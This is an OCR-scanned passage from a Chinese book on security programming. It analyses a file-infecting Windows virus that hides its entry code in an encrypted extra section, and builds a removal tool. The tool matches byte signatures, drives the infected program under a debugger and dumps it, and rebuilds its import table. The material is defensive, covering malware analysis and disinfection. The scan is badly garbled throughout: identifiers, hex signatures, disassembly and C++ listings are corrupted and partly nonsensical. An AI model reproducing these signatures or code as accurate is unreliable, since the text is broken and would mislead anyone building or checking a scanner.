知 的 节 ， 同 样 是 最 后 一 个 节 ， 但 是 名 称 是 “QDATA ”。 看 来 病毒 每 次 感染 文件 后 生成 的 节 名 
并 不 相同 ， 使 用 了 随机 节 名 的 方法 。 


2 0LEEDB32. DLL 专 杀 工具 


扫 笑 范围 一 Ee 二 
查 杀 范围 | 了 ocunents snd Settings\Ynlser\ 目 历 \ 病 毒 《 





涡 琵 CATocunents snd Settines\YnUser\ 磺 面 \ 病 毒 ( 感染 型 的 ) exs 


3 线 和 要 “ 


| _ 了 序号 | 病毒 位 轩 eT [多 窟 |] 
1 C:\Documents sand Settings\YnUser\ 卡 面 \ 病 毒 ( 感 当 型 未 处 理 
回 2 C:\Documents and Settings\ymUstr\ 夏 面 \ 病 毒 ( 感染 型 未 处 理 





文件 :Ei WDocunents and SettingsVYAUSeT 球面 \ 珊 毒 5 大 瑰 型 的 7 让 | .| 








天 口 点 00065157 于 区 段 : Fat 

文件 偏 移 : 0000250F 首 字 节 : 本 B854,00 >| 

链接 器 信息 : 5 12 子 条 统 ; 。 册 n32 5 >| 

逢 去 也 没 发 现 

多 对 扫描 如 | | 任务 查 看 器 占 ) | ， 选项 @) 关于 的) 退出 史 

也 置 于 项 部 后) I»|| =>] 
图 8-53 感染 型 病毒 专 杀 工具 图 8-54 用 PEID 查看 入 口 所 在 节 


在 没 改变 入 口 的 情况 下 感染 可 执行 文件 的 方法 ， 可 能 是 修改 了 程序 的 前 几 个 字 节 ， 形 成 
了 类 似 mline Hook 的 jmp 的 方法 。 另 外 的 一 个 方法 是 将 入 口 代码 全 部 搬 走 。 用 OD 打开 其 中 





人 
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一 个 样本 ， 反 汇编 代码 如 下 : 


004031DF > $ 60 


004031E0 
004031E5 
004031EB 
004031F0 
004031F2 
004031F4 
004031F5 
004031F6 
004031E8 
004031FD 
004031FE 
00403201 
00403205 





E8 54000000 
8DBD 00104000 
B8 216E0000 
03F8 

8BF7 

50 

9B 

DBE3 

68 33104000 


DEC1 


pushad 
Call 
lea 
mov 
add 
mov 
push 
wait 
于 了 号 
push 
push 
fild 
fild 
faddp 


标志 


F0000020 
40000040 
Co000040 
40000040 


FE0000020 


图 8-55 ”发 现 节 表 中 有 可 疑 节 “.rrdata” 


00403239 

edi, dword ptr [ebp+401000] 
eax, 6E21 

edi, eax 

esi, edi 

eax 


00401033 

ebp 

dword ptr [esp] 
dword ptr [esp+4] 
St) 





00000000 Co000000 
rdata D00BA000 D0000018 D00BSED0 00000200 50000040 
reloc 00058B000 O00OCBAC 00086000 QODOCA0G 50000040 
rsre Doocso00 0000CE00 O00CZADO O000CE00 。 50000040 
QDATA 0onns000 “00005000 O00CF800 00005000 E0000020 ” 岗 





图 8-56 另 一 个 样本 中 的 可 疑 节 “.QDATA” 


按 F8 键 单 步 一 下 ， 然 后 在 命令 栏 里 输入 hr esp 并 按 回 车 键 。 按 F9 键 运行 程序 ， 程 序 停 
止 在 如 下 代码 处 : 


0040A243 
0040A248 
0040A24A 
0040A24B 
0040A24F 
0040A250 
0040A251 


B8 DF314000 
FFEO 

43 

3A5C57 49 


moOv 
jmp 
Ee: 
cmp 
dec 
inc 
dec 


6ax, < 模块 入 口 点 > 

eax 

ebx 

bl, byte ptr [edi+edx*2+49] 
esi 

esp 

edi 


可 以 看 到 ，0040A243 地 址 处 的 代码 显示 为 mov eax, < 模块 入 口 点 >， 这 里 的 < 模块 入 口 
点 > 是 OD 自动 分 析出 来 的 。 
在 命令 栏 里 输入 hd esp 并 按 回 车 键 ， 按 F8 键 分 别 执行 0040A243 和 0040A248 指令 ,来 


到 如 下 代码 处 : 


004031DE > $ 6RA 00 


004031E1 
004031E6 
004031EB 
004031F0 
004031F1 
004031F2 
004031F7 
004031F9 
004031FB 
004031FC 
004031FF 


可 以 看 到 ， 


? E8 30010000 
? A3 7Cc504000 
E8 14010000 


B9 04010000 
BO 22 
F2:AE 


803F .22 
2 790A 


Ne OO 
EO 
~ 


push 
call 
mov 
call 
xchg 
ince 
MmOV 
mov 
repne 
YC 
cmp 
jnz 


0 
<jmp.&kernel32.GetModuleHandleA> 
dword ptYr¥ [40507C], eax 
<jmp,.&kernel32.GetCommandLineA> 
eax, Sdi 

edi 

ecx; 104 

aly. 22 

scas byte ptr es:;[edil] 

edi 

byte ptr [edi], 22 

short 0040320B 


代码 执行 到 了 004031DF 处 。 


注 : 004031DF 的 地 址 和 用 OD 刚 打 开 病 毒 时 的 地 址 是 相同 的 ， 说 明 病 毒 又 跳 转 回来 执行 了 。 观 察 这 个 代 
码 ， 发 现 是 ASM 的 启动 代码 。 看 来 病毒 是 将 原始 程序 的 入 口 代码 又 写 入 程序 的 原 入 口 点 处 让 其 执行 了 。 


按 Ctrl+F2 组 合 键 重新 开始 调试 该 病毒 程序 ， 在 数据 窗口 来 到 入 口 代码 处 ， 并 且 下 一 个 


尝 弗 音 将 醒 著 明 狂 ”山中 小 
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“内 存 写 入 ”的 断 点 。 


第 为 什么 这 么 做 呢 ? 因为 通过 上 面 的 分 析 ，004031DF 地 址 处 的 代码 两 次 被 执行 ， 但 是 两 
章 次 的 代码 不 相同 ， 就 要 知道 是 哪里 修改 了 此 处 地 址 的 代码 。 设 置 好 内 存 写 入 断 点 后 按 F9 键 
运行 ， 被 中 断 在 0040A023 地 址 处 ， 反 汇编 代码 如 下 : 
黑 0040A016 B9 35000000 moO ecx, 35 
总 0040A01B 8DB5 4R124000 lea esi, dword ptr [ebp+40124A] 
0040A021 8BF8 mov edi, eax 
程 0040A023 F3:66:A5 rep movs word ptr es:[edi], word ptr [esi] ”中 断 在 这 里 
实 0040A026 33DB XGO ebx, ebx 
例 0040A028 64:67:8B1E 3000 mov ebx, dword ptr fs:[30] 
剖 0040A02E 85DB test Ebx, ebx 
析 


观察 EDI 寄存 器 的 值 ， 刚 好 是 004031DF， 也 就 是 程序 的 入 口 地 址 。 
选中 0040A026 地 址 ， 按 F2 键 设置 一 个 断 点， 将 刚才 设置 的 “内 存 写 入 ” 断 点 删除 ， 按 
F8 刍 单 击 一 下 ， 让 程序 停止 在 0040A026 地 址 处 。 


| 


注 : 为 什么 要 在 0040A026 上 设置 一 个 断 点 再 按 F8 键 呢 ? 因为 笔者 调试 的 时 候 发 现 ， 如 果 直 接 按 F8 键 的 
话 ， 程 序 就 跑 到 别处 了 。 


当 程 序 停止 在 0040A026 地 址 处 时 ， 将 该 处 的 断 点 取消 。 在 反 汇 编 窗 口中 查看 004031DF， 
发 现 已 经 将 ASM 程序 的 入 口 代 码 还 原 了 。 
按 Ctrl+F2 键 重新 开始 调试 该 病毒 程序 ， 直接 查看 0040A023 地 址 处 的 代码 ， 反 汇编 代码 


如 下 : 
0040A020 0056 28 add byte ptr [esi+28], di 
0040A023 LGE adc esi, eax 
0040A025 4D dec ebp 
0040A026 43 inc ebx 
0040A027 35 24939BE4 XOr eax, E49B9324 
0040A02C DOEFF sar hal 


和 刚才 的 代码 不 相同 ， 看 来 这 段 代 码 是 被 加 密 处 理 的 。 这 段 代码 的 解密 是 由 病毒 的 入 口 
代码 完成 的 ， 当 入 口 代码 将 加 密 后 的 代码 还 原 后 ,直接 由 00403237 的 跳 转 代码 跳 转 而 来 ， 代 


人 码 如 下 : 
0040322B + ,DLES shr CX 1 
0040322D . 66:AB stos word ptr es: [edi] 
0040322F 到 人 loopd short 00403243 
00403231 : B81EF FC4F0000 :sub edi, A4FFC 
00403237 a EEEY jmp edi 
00403239 $ 8B2C24 mov ebp, dword ptr [esp] 
0040323C 81 db 81 
00403237 是 病毒 入 口 解密 代码 的 最 后 一 名 代码 , 当 该 句 jmp 被 执行 后 , 来 到 如 下 代码 处 : 
0040A004 58 pop eax 
0040A005 58 pop eax 
0040A006 B8 00104000 moOV eax, 00401000 
0040A00B 03C5 add eax, ebp 
0040A00D 5B pop ebx 
0040A00E 03EB add ebp, ebx 
0040A010 8985 44124000 mov dword ptr [ebp+401244], eax 
0040A016 B9 35000000 mov ecx, 35 
0040A01B 8DB5 4A124000 lea esi, dword ptr [ebp+40124A] 
0040A021 8BE8 mov edi, eax 
0040A023 FBJ606rAS rep movs word ptr es: [edi], word ptr [esi] 
0040A026 33DB XOr ebx, ebx 
0040A028 64;67:8B1E 3000 mov ebx, dword ptr fs:[30] 
0040A02E 85DB test ebx, ebx 
0040A030 78 0E js short 0040A040 
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可 以 看 到 ，0040A023 就 是 还 原 ASM 程序 入 口 代码 的 rep movs 指令 。 
仍然 在 0040A026 地 址 处 按 F2 键 设置 断 点 ， 
按 F9 键 执行 到 0040A026 地 址 处 ， 然 后 取消 F2 人 
断 点 。 观 察 EAX 发 现 ， 此 时 EAX 即 为 入 口 地 址 ， EPE RE ~ ody DF ‘goreipasoep| coca | 
那么 修改 0040A026 地 址 处 的 代码 为 jmp eax。 按 Bareol ode [0 一 gase of bats 一 
F8 键 单 步 执行 jmp eax 指令 ， 即 来 到 已 经 还 原 好 Fe Soe nee or Purp nage 二 


Section | Vitual Size |[ Vitual Ofiset | Raw Size | Raw ilse! | Charactarstcs | 
的 入 口 地 址 。 到 了 入 口 处 ， 即 可 将 程序 从 内 存 中 IE OO DIE OU 。 《non 
转 存 到 磁盘 上 。 0 

在 OD 的 菜单 栏 中 选择 “插件 ->OllyDump-> 
Dump debugged process”， 出现 图 8-57 所 示 的 窗 ee 
口 。 单 击 “Dump” 按 钮 ， 选 择 保存 的 位 置 ， 保 存 和 
名 为 “dump.exe”， 这 样 就 将 内 存 中 的 程序 转 存 到 a 
了 磁盘 文件 上 。 执 行 dump.exe 程序 ， 发 现 可 以 执行 。 用 OD 打开 该 程序 ， 发 现 入 口 处 是 类 似 
ASM 的 入 口 代码 。 

下 面 编程 来 完成 病毒 的 扫描 和 转 存 。 为 了 能 够 识别 被 此 类 病毒 感染 的 程序 ， 需 要 在 样本 
文件 中 提取 特征 码 。 提 取 的 特征 码 是 样本 文件 的 入 口 代码 ， 病 毒 样本 入 口 的 代码 是 用 来 解密 
还 原 真正 病毒 的 代码 ， 而 每 个 样本 的 解密 密 钥 是 不 同 的 ， 其 差异 只 有 4 字 节 。 因 此 分 两 段 来 
进行 匹配 ， 提 取 的 特征 码 如 下 : 


#define VIRUS. SIGN LEN 0x66 


OllyDunp 一 Endlanager. exe 














char szVirusSignl{] = 
"\xX60\xE8\xS54\x00\x00\x00\zxz8D\xBD\x00\x10\x40\x00\xB8"; 


char szVirusSign2[] = 
"\XOO\xO03\xF8\xX8B\XEFE7\xS50\x9B\xDB\xE3\x68\x33\x10\x40\x00\x55\xDB" 
"\xO04\x24\xDB\x44\x24\x04\xDE\xC1\xDB\x1C\x24\x8B\x14\x24\xB9\x00" 
WM\x28\x00\x00\x66\xAD\x89\x0C\x24\xDB\x04\x24\xDA\x8D\x66\x10\x40" 
"\xO00\xDB\x1C\x24\xD1\xEl\x29\x0C\x24\x33\x04\x24\xD1\xE9\x66\xAB" 
"\xE2\x12\x81\xEF\xFC\x4F\x00\x00\xFE\xE7\x8B\x2C\x24\x81\xED\x06" 
uMNxTONx40NZO0O0\xCINEEE\ REY 


扫描 文件 匹配 特征 码 时 ， 需 要 先 判 断 文 件 是 否 为 有 效 的 PE 文件 ， 然 后 才 进 行 特征 码 匹 
配 。 特 征 码 匹配 的 代码 如 下 : 


BOOL CKillOleMdb32D1g::IsVirpile(Cstring strPath) 
{ 
BOOL bRet = FALSE; 
HANDLE hpile = CreateFile(strPath.GetBuffer (0), 
GENERIC READ, FILE SHARE READ, 
NULL, (OPEN., EXTSTING, 
FILE ATTRIBUTE NORMAL, NULL); 
HANDLE hMap = CreateFileMapping (hFile, NULEL, PAGE READONLY, 0, 0, NULL); 
LPVOID lpBase = MapViewOfFile'(hMap, FILE MAP READ, 0, 0, 0); 
PIMAGE NT HEADERS pImgNtHdr = ImageNtHeader (lpBase); 
DWORD dwEntryPoint = pImgNtHdr->OptionalHeader.AddressOfEntryPoint; 
PIMAGE SECTION HEADER plmgSecHdr = ImageRvaToSection (pImgNtHdr, lpBase, dwEntry 
Posnt),? 


// 定位 入 口 地 址 在 文件 中 的 地 址 

DWORD dwFA = ((dwEntryPoint - plImgSecHdr->VirtualAddress + plmgSecHdr->Pointer 
ToRawData) + (DWORD) lpBase),; 

// 比较 第 一 段 特征 码 


iP memenpt (tonst rond NONWRR const mold mem Vinseignl, ia) = 9 ) 


沭 瑾 全 将 沿革 啊 酒 山 o 商 


| 
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四 WER 二 = 0X10; 


第 // ,比较 第 二 段 特 征 码 
8 主 和 在 (memcrmebf (const void*)AwFA, (const void *)szVirusSign2, 0x66 - 0x10) == 0 ) 
= | 
3 bRet = TRUE,; 
. 
a 1 
编 UnmapViewOfFile(lpBase); 
程 CloseHandle (hMap); 
实 CloseHandle (hFile); 
例 
剖 return bRety 
析 } 


匹配 特征 码 的 函数 返回 值 是 BOOL 类 型 。 如果 发 现 当 前 扫描 的 程序 的 入 口 代码 与 病毒 的 
epee 特征 码 相 同 ， 那 么 就 会 返回 TRUE， 从 而 进行 后 续 的 处 理工 作 。 

对 病毒 的 修复 都 封装 在 一 个 CRepairPe 类 中 ， 通 过 构造 函数 将 病毒 文件 的 完整 路 径 
传递 给 该 类 , 由 构造 函数 调用 一 些 列 的 相关 函数 进行 处 理 。 现 在 要 完成 的 功能 是 将 已 经 还 
原 好 的 入 口 代 码 从 内 存 中 转 存 到 磁盘 文件 上 ， 主 要 看 CRepairePe:: DumpVir(char *strVir); 
函数 : 

0 CRepairPpe: :DurpVIir CHaz wstrVir) 














STARTUPINFO si; 
PROCESS_INFORMATION pi; 


si.cb = sizeof (si); 
GetSstartupInfo(gsi); 


DEBUG EVENT de = {0 1}; 
CONTRXT. oomntext el 是 0 


// 创建 病毒 进程 

BOOL bRet = CreateProcess (strVir, 
NULEL, "NULL, NULL, FALSE, 
DEBUGI PROGESS | IDEBUG ONDLY THISIPROCESS, 
NUTL, (NUD, (Ba DY 


CloseHandle (pi.hThread); 
vlLloseHandle (pi apzocess) 


BYTE bCode; 
DWORD dwNum; 


// 第 几 次 断 点 


nto TD 
Wahiher tC TRYE ) 


{ 
// 开始 调试 循环 
WaitForDebugEvent (gde, INFINITE); 


switeh (de,.dwDebughventCode, ) 
{ 
Case CREATE PROCESS DEBUG EVENT: 


{ 
/7 计算 入 口 地 址 +0x58 的 地 址 
// 即 解密 还 原 完 后 续 病 毒 处 的 
// jmp edi 的 地 址 处 
DWORD dwAddr = 0x58 + (DWORD)de.u,.CreateProcessinfo,.lpStartAddress; 


// 暂停 线程 
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} 
Gase EXC 


{ 


} 


SuspendThread(de.u.Createprocesstnfo.hThread)’; 

// 读 取 入 口 地址 +0x58 地 址 处 的 字 节 码 

ReadProcessMemory (de.u.CreateProcessinfo.hProcess, 
(const void *)dwAddr, 
&bCode, sizeof (BYTE), &dwNum); 

/7 在 入 口 地 址 +0x58 地 址 处 写 入 0xCC 

aL BS IMDS 

WriteProcessMemory (de.u.CreateProcessInfo.hprocess, 
(void *)dwAddr, &bCC, 
sizeof (BYTE), &dwNum); 

// 恢复 线程 


ResumeThread(de.u.CreateProcessInfo.hThread); 
break; 
EPTION DEBUG EVENT: 


snlteohl (me 
Gase 0: 
// 第 0 次 的 断 点 是 系统 断 点 
// 这 里 忽略 
EOC 
break; 


Casel ls 


OneCc (&de, &bCode); 
TCG TH 证 
break; 


TwoCc (gde, &bCode); 
TGC 十 让 区 
break; 


Case 3: 
ThreeCc(&de, &bCode); 
EC ， 直 二 沪 
goto endo0; 
break; 


case 4: 


和 RO 汕 市 了 
goto end0; 


ContinueDebugEvent (de .dwProcessId, de.dwThreadId, DBG CONTINUE); 


} 


end0: 


} 
在 触发 创建 进程 的 异常 时 ， 在 jmp edi 处 设置 断 点 ， 因 为 到 了 jmp edi 时， 真正 的 病毒 
代码 已 经 解密 完成 了 。 根 据 调 试 病毒 的 情况 ， 需 要 处 理 3 次 断 点 。 第 一 次 处 理 断 点 的 代码 


如 下 : 


bRet = TRUE; 
return bRet; 


尝 悟 齐 将 沿革 啊 狂 山 吧 滥 
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VOID CRepairPe:;':OneCc (DEBUG, EVENT *pDe, BYTE *bCode) 
{ 


第 // 在 jmp edi 处 断 下 后 
8 // 首先 需要 恢复 jmp eqi 原来 的 字 节 码 
x // 然后 在 还 原 完 原 入 口 代码 的 下 一 名 代码 处 
时 // 即 xor ebx, .ebx 人 处 设置 断 点 
CONTEXT context? 
黑 DWORD dwNum; 
客 HANDLE hProcess = OpenProcess (PROCESS ALL ACCESS， 
编 FALSE, pDe->dwProcessId); 
程 HANDLE hThread = OpenThread (THREAD, ALL ACCESS ， 
二 FRALSE，PDe->dwThreadId) : 
例 SuspendThread (hThread); 
. BYTE bTmp; 
ReadProcessMemory (hProcess, 
pDe->u.Exception,.ExceptionRecord.ExceptionAddress, 
&bTmP， sizeof (BYTE), &dwNum),; 
Ce ey 


Context ,ContextElLags = CONTEXT FULL; 
GetThreadContext (hThread, &context); 


CoOmntextwhin 
WriteproocessMemory'(hProoess,, (void *)eonbtext. Bipy 
bCode, sizeof (BYTE), &dwNum); 


SetThreadContext (hThread, &eontext); 


DWORD dwEdi = context.Edi + 0x22; 
ReadProcessMemory (hpProcess, (censt void *)dwEdi, 
bCode, sizeof (BYTE), &dwNum); 
WriteProcessMemory (hProcess, (void *)dwEdi, 
&PCC， sizeof (BYTE), &dwNum); 


SetThreadContext (hThread, gcontext),; 


ResumeThread (hThread); 

CloseHandle (hThread); 

CloseHandle (hProcess); 
} 


第 二 次 处 理 断 点 的 代码 如 下 : 
VOID CRepairpe;:: TwoCc(DEBUG EVENT *pbe, BYTE BCodey 
{ 
// 在 xor ebx，ebx 处 断 下 后 
// 首先 需要 恢复 xor ebx，ebzx 原来 的 字 节 码 
/7 然后 修改 xor ebx，ebx 为 jmp eax 
/7Y 并 在 入 口 点 设置 断 点 
CONTEXT context; 
DNWORD dwNum; 
HANDLE hpProcess = OpenProcess (PROCESS ALL ACCESS, 
FNSE, PpDe->dwRrocessLld)y 
HANDLE hThread = OpenThread (THREAD ALL ACCESS, 
FALSE, pDe~>dwThreadId); 
SuspendThread (hThread)，} 


人 

ReadProcessMemory (hProcess, 
pDe->u.Exception.ExceptionRecord.ExceptionAddress, 
&bTlTmp, sizeof (BYTE), &dwNum); 


context.Contexthlags = CONTEXT FULE; 
GetThreadContext (hThread, &context); 


Sonteosb bm 
WriteProcessMemory (hProcess, (void *)context.Eip, 
byms, sizeof (BYTE) * | 2, (dwNum) 





D | a 
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ReadProcessMemory (hProcess, (const woid *)context ,Eax, 
bCode, sizeof (BYTE), &dQwNum); 


WriteProcessMemory (hProcess, (void *)context ,Eax, 
&bCC, sizeof (BYTE), &dwNum); 


SetThreadContext (hThread, &context); 


ResumeThread(hThread); 
CloseHandle (hThread); 
CloseHandle (hProcess)s 


} 
第 三 次 处 理 断 点 的 代码 如 下 : 


VOID CRepairPe::ThreeCc (DEBUG EVENT *pDe, BYTE *bCode) 


{ 
// 在 入 口 点 断 下 后 
// 恢复 入 口 点 的 代码 
// 然后 开始 dump 
CONTEXT context; 
DWORD dwNum; 
HANDLE hProcess = OpenProcess (PROCESS ALL ACCESS， 
FALSE, plDe->dwProcessId); 
HANDLE hThread = OpenThread (THREAD ALL ACCESS, 
FALSE, pDe->dwThreadId); 
SuspendThread (hThread); 


BYTE bTmp; 

ReadProcessMemory (hpProcess, 
PpDe->u.Exception.ExceptionRecord.ExceptionAddress, 
&bTmp, sizeof (BYTE), &dwNum); 


context.ContextFlags = CONTEXT FULL; 

GetThreadContext (hThread, &context); 

WriteProcessMemory (hProcess, 
PpDe->u.Exception.ExceptionRecord. ExceptionAddress, 
bCode;, sizeof (BYTE), &dwNum); 

COnNntext. Pip ——7 

SetThreadContext (hThread, &context); 

Dump (pDe, context.Eip); 

ResumeThread (hThread); 


CloseHandle (hThread); 
CloseHandle (hProcess) 


三 次 处 理 入 口 的 断 点 时 ， 需 要 把 整个 文件 从 内 存 转 存 到 磁盘 文件 上 ， 需 调用 CRepairPe:: 


Dump(DEBUG_EVENT *pDe, DWORD dwEntryPoinb; 函 数 ， 其 代码 如 下 : 
VOID CRepairpPe: :Dump (DEBUG EVENT *pDe, DWORD dwEntryPoint) 


{ 
DWORD dwPid = pDe->dwProcessIld; 


MODULEENTRY32 me32; 
HANDLE hSnap = CreateToolhelp32Snapshot (TH32CS_SNAPMODULE, dwPid); 
me32.GwSize = sizeof (MODULEENTRY32); 


BOOL bRet = Module32First (hSnap, &me32) 7 


HANDLE hrFile = CreateFile (me32.szExePath, GENERIC READ, 
FILE SHARE READ, NULE, 


367 


超 % 溃 


妆 昌 空 将 前 滁 晒 湘 
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OPEN_ EXISTING, 
FILE. ATTRIBUTE, NORMAL, NULLD) 7 


/7 判断 BE 文件 的 有 效 性 

= IMAGE,_ DOS_HEADER imgDos = { 0 }; 

Se DWORD dwReadNum = 0; 

黑 ReadFile (hFile, &imgDos, sizeof (IMAGRE DOS HEADER), &dwReadNum, NULL); 
客 SetFilePeintetkr(hEile， imgDos.e lfanew, 0 FILE BEGIN); 

编 IMAGE NT HEADERS imgNt = { 0 }; 

程 ReadFile(hFile, &imgNt, sizeof (IMAGE NT HEADERS), &dwReadNum, NULL); 
实 

例 ， 

剖 // 得 到 EXE 文件 的 大 小 

析 DWORD BaseSize = me32.modBaseSize; 


if ( imgNt.OptionalHeader.SizeOfIimage > BaseSize ) 
{ 
BaseSize = imgNt.OptionalHeader.SizeOfImage; 


| 


} 
LPVOID pBase = VirtualAlloc (NULL, BaseSize, MEM COMMIT, PAGE READWRITE).; 


HANDLE hProcess = OpenPnocess (PROCESS ALL ACCESS, FALSE, dwPid); 

// 读 取 文件 的 数据 

bRet = ReadProcessMemory (hProcess, me32.modBaseAddr, pBase, me32.modBaseSize, NULL); 
PIMAGE DOS, HEADER pDos = (PIMAGE DOS HEADER)pBase; 

PIMAGE_ NT HEADERS pNt = (PIMAGE NT HEADERS) (pDos->e lfanew + (PBYTE)pBase); 


/4 设置 文件 的 入 口 地 址 
PNt->OptionalHeader.AddressOfEntryPoint = dwEntryPoint ~ PNE->OptionalHeader. 
ImageBase,; 
// 设置 文件 的 对 齐 方 式 
PNt->0ptionalHeader.FileAlignment = 0x1000; 
PIMAGE SECTION HEADER pSec = (PIMAGE SECTION HEADER) ( (PBYTE) gpNt->OptionalHeader + 
PNt->FileHeader.SizeOfOptionalHeader),; 


for ( int iA 0 LT < PNt->FileHeader.NumberOQFfSections: Ll 由 + ) 
pSec->PointerToRawData = pSec->VirtualAddress; 
pSec->SizeOfRawData = pSec->Misc.VirtualSize; 
PS3ec ty 

} 

CloseHandle (hFile); 


mi .StorVirs rm Str virhett(metrVvir, Reversepinea (NY Ys 
m StrVir += "NN\dump .exe"™; 


HEile = CreateFile(m StrVir,GetBuffer(0), GENERIC WRITE, FILb SHARE READ, NULE, 
CREATE ALWAYS, FILE ATTRIBUTE NORMAL, NULL):} 





DWORD dwWriteNum = 0; 


// 将 读 取 的 数据 写 入 文件 
| bRet = WriteFile(hFile, pBase, me32.modBaseSize, &dwWriteNum, NULL); 


| CloseHandle (hFile); 

| VirtualFree(pBase, me32.modBaseSize, MEM RELEASE); 
| CloseHandle (hProcess); 

| CloseHandle (hsSnap):; 


} 
执行 转 存 出 来 的 dump.exe 程序 ， 发 现 是 可 以 运行 的 。 用 PEID 进行 PE 识别 ， 可 以 识别 


| 出 是 ASM 写 的 程序 ， 如 图 8-58 所 示 。 
| 接着 要 修复 导入 表 信 息 ， 用 PEID 对 比 导 入 表 的 信息 ， 如 图 8-59 所 示 。 
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ME PEiD w0.94 

文件 :Nocunents and Settinas\Wnlsar\ 桌 面 \ 病 毒 ( 感染 型 的 ?\ 末 [| 
入 口 点 ;Do00311F EP 区 段 : | text [>] 
文件 偏 移 : 。 D00031DF 首 字 节 : “到 兢 ,而 可 ”| | 
链接 器 信息 ; 5, 这 子 系统 : 了 购 132 全 于 2 
MASM3E 7 TASHa2 

多 重 扫描 册 | | 任务 查看 器 (I | | 选项 @) | 关于 凶 | 进出 Q@) | 
jy 置 于 顶部 (8) EE3 





图 8-58 ”正确 识别 可 执行 文件 


时 间 融 由 | Thunk 时 间 改 
000045EC 00000000 Ei OASEC ey 
kernel32. dl DDO0457C 00000000 arnel32 dll Dn000000 
advapi32. dl O0004546 00000000 advapi32, dl 00000000 
comdle32. 1 00004568 D6000000 comdlg32. dl DoD000000 
shel132. dl O00045E4 00000000 shell32, dl ~ D00045E4 00000000 
gdi32. dll 00004570 Dbbooo00 Bdi32, dl 00004570 60000000 


转 存 后 


| Thank EVA | Thunk 偏 移 Thnk 但 | Thunk_RVA | Thunk 偏 移 | Thank 利 | | 提示 /序数 
| 000040A4 00002BAd D0n04848 COOOAOA4 000040A4 TTDIDCSA 0222 

| 000040A8 000028A8 D0004838 000040AB DO004088 TTDIDEI3 021D 

| 000040AC 000028AC 0000482A 000040AC 000040AC TTD1ESDC 

000040B0 00002830 QO00481A 00004080 000040B0 TTI1IE2AE 

| 000040B4 000028B4 00004804 | 000040B4 000040DB4 T7D3152F 

| 000040B6 000028B8 000047F2 000040B8 000040B8 TTDICSBS 

| 000040BC 000028BC 000047E2 | 0000408C 000040BC TTDIEEFT 

000040C0 00002800 000047D4 Do0040c0 00004000 77TlDs15 





图 8-59 ” 转 存 前 后 导入 表 信 息 比较 


要 处 理 该 部 分 非常 简单 ， 只 要 把 转 存 前 的 导入 信息 赋值 给 转 存 后 的 导入 信息 即 可 ， 具 体 


代码 如 下 : 

VOID CRepairpe: Buildrat (char “Sre, char *pDest) 

{ 
getchar()'; 
PIMAGE DOS_ HEADER pSrcIimgDosHdr, pDestIimgDosHdr; 
PIMAGE NT HEADERS pSrcImgNtHdr, pDestIimgNtHdr; 
PIMAGE._ SECTION HEADER pSrcIimgSecHdr, pDestIimgSecHdr; 
PIMAGE IMBPORT DESCRIPTOR pSrcImpDesc, pDestIimpDesc; 


HANDLE hsSrcFile, hDestFile; 
HANDLE hsrcMap, hDestMap; 
LPVOITD 1pSrcBase, lpDestBase; 


hsrcFile = CreateFile(pSrc, GENERIC READ, FILE SHARE, READ, 
NULL, OPEN. EXISTING, 
FILE ATTRIBUTE NORMAL, NULL); 
hDestFile = CreateFile(pDest, GENERIC READ | GENERIC WRITE， 
FILE SHARE READ, NULE, OPEN, EXISTING, 
EFILE ATTRIBUTE NORMAL, NULL)Y 


hsroMap (= CreaterileMapping(hSsreFile, NULL, PAGE READONEY, 0, 0 
hDestMap = CreateFileMapping (hDestFile, NULL, PAGE READWRITE, 0, 0, 
1pSrcBase = MapViewOfFile(hSsrcMap, FILE MAP READ, 0, 0, 0); 


lpDestBase = MapYViewOfFile(hDestMap, FILE MAP WRITE 0, 0 0)7 


pSrecIimgDosHdr = (PIMAGE DOS HEADER)1pSrcBase; 
pDestIimgDosHdr = (PIMAGE DOS HEADER) lpDestBase; 


ESroclmgNtHdr = (PIMAGE NT_HEADERS) ( (DWORD) lpsrcBase 
+ pSsrclimgDosHdr->e lfanew); 


0); 





册 o 潍 
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PDestImogNtHdz = (PIMAGE NT HEADERS) ( (DWORD) lpDestBase 
+ pDestImgDosHdr->e lfanew); 

8 ps3rcIimgsSecHdr = (PIMAGE SECTION. HEADER) ( (DWORD) &pSrcImgNtHdr->0ptionalHeader 
= + pSsrcIimgNtHdr->FileHeader.SizeOfOptionalHeader); 
pDestimgSecHdr = (PIMAGE SECTION HEADER) ( (DWORD) gpDestIimgNtHdr->0ptionalHeader 
时 + pDestImgNtHdr->pileHeader.SizeOfOptionalHeader); 
DWORD dwImpSrcAddr, dwIimpDestAddr; 
程 dwImpSrcAddr = pSrcImgNtHdr->OptionalHeader.DataDirectory[IMAGE DIRECTORY ENTRY 
实 _IMPORT] .VirtualAddress; 
例 dwImpDestAddr = pDestImgNtHdr->OptionalHeader.DataDirectory[IMAGE DIRECTORY ENTRY 
剖 .IMPORT] .VirtualAddress; 


dwImpSrcaAddr = (DWORD) lpSrcBase + Rva2Fa(pSreImgNtHdr, lpSrcBase, dwImpSrcAddr); 
dwImpDestAddr= (DWORD) lpDestBasetRva2Fa(pDestIimgNtHdr,JpDestBase, dwImpDestAddr); 


Ka // 定位 导入 表 
PSrcImpDesc = (PIMAGE IMPORT DESCRIPTOR)dwimpSrcAddr; 
PDestImpDesc = (PIMAGE IMPORT DESCRIPTOR) dwIimpDestAddr; 


PIMAGE THUNK DATA pSrcIimgThkDt, pDestImgThkDt; 


Ln 
while ( pSrcIimpDesc->Name && pDestIimpDesc->Name ) 
t 
i 
char *pSsrcIimpName = (char*) ((DWORD) lpSrcBase 
+ Rva2Fa(pSrcIimgNtHdr, lpSrcBase, pSrcIimpDesc->Name)); 
char *pDestImpName = (char*) ((DWORD) lpDestBase 
+ Rva2Fa(pDestImgNtHdr, lpDestBase, pDestIimpDesc->Name)); 


pSrecImgThkDt = (PIMAGE THUNK_ DATA) ( (DWORD) lpSrcBase 

+ Rva2Fal(lpSsrcIimgNtHdr, lpSrcBase, pSrclImpDesc->FirstThunk))’; 
pDestIimgThkDt = (PIMAGE THUNK DATA) ( (DWORD) lpDestBase 

+ Rva2Fa(pDestImgNtHdr, lpDestBase, pDestIimpDesc->FirstThunk)); 


/7 赋值 信息 
while (*((DWORD *)PSrcImgThKDt) && *((DWORD *)pDestIimgThkDt) ) 
{ 

DWORD dwIatAddr = *((DWORD *)pS3rcImgThkDt); 

*((DWORD *)pDestIimgThkDt) = dwIliatAddr; 


poreLmgTnknt 
BpDestImagThkDt 二 机 7 
} 


pareoLmpDesor tw 
PDestlmpDese hry 


UnmapViewOfFile(lpDestBase); 
UnmapViewOfFile (lpSrcBase); 


CloseHandle (hDestMap); 
CloseHandle (hsSrcMap); 


CloseHandle(hDestFile); 
CloseHandle (hsSrcFile); 


} 
